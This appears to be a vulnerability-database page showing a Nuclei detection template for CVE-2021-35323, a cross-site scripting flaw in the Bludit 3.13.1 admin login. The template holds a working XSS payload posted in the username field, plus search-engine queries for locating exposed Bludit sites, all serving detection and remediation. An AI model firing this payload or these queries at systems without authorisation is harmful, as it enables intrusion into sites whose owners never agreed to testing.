Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-35323
HistoryOct 17, 2023 - 7:20 a.m.

Bludit 3.13.1 - Cross Site Scripting

2023-10-1707:20:28
ProjectDiscovery
github.com
4
cve2021
bludit
cross site scripting

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.002 Low

EPSS

Percentile

55.8%

Cross Site Scripting (XSS) vulnerability exists in bludit 3-13-1 via the username in admin/login
id: CVE-2021-35323

info:
  name: Bludit 3.13.1 - Cross Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    Cross Site Scripting (XSS) vulnerability exists in bludit 3-13-1 via the username in admin/login
  remediation: Bludit v4.0.0
  reference:
    - https://github.com/bludit/bludit/issues/1327
    - https://nvd.nist.gov/vuln/detail/CVE-2021-35323
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-35323
    cwe-id: CWE-79
    epss-score: 0.00183
    epss-percentile: 0.55471
    cpe: cpe:2.3:a:bludit:bludit:3.13.1:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: bludit
    product: bludit
    shodan-query:
      - title:"Bludit"
      - http.title:"bludit"
    fofa-query: title="bludit"
    google-query: intitle:"bludit"
  tags: cve2021,cve,bludit,xss

http:
  - raw:
      - |
        GET /bludit/admin/login HTTP/1.1
        Host: {{Hostname}}
      - |
        @timeout: 10s
        POST /bludit/admin/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        tokenCSRF={{tokenCSRF}}&username=admin%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&password=pass&save=

    host-redirects: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(content_type_2, "text/html")'
          - 'contains(body_2, "<img src=x onerror=alert(document.domain)>") && contains(body_2, "Bludit")'
        condition: and

    extractors:
      - type: regex
        name: tokenCSRF
        part: body
        group: 1
        regex:
          - 'type="hidden" id="jstokenCSRF" name="tokenCSRF" value="(.*)"'
        internal: true
# digest: 4b0a0048304602210091253952bc166912922183e2e50d68a18eb9ebd0947c407ac2a5761ba4fb0ae4022100c5fcc25f192bd94fb2e63387b3e1f6caab70397c331a71ad7e33ed78519f01a6:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.002 Low

EPSS

Percentile

55.8%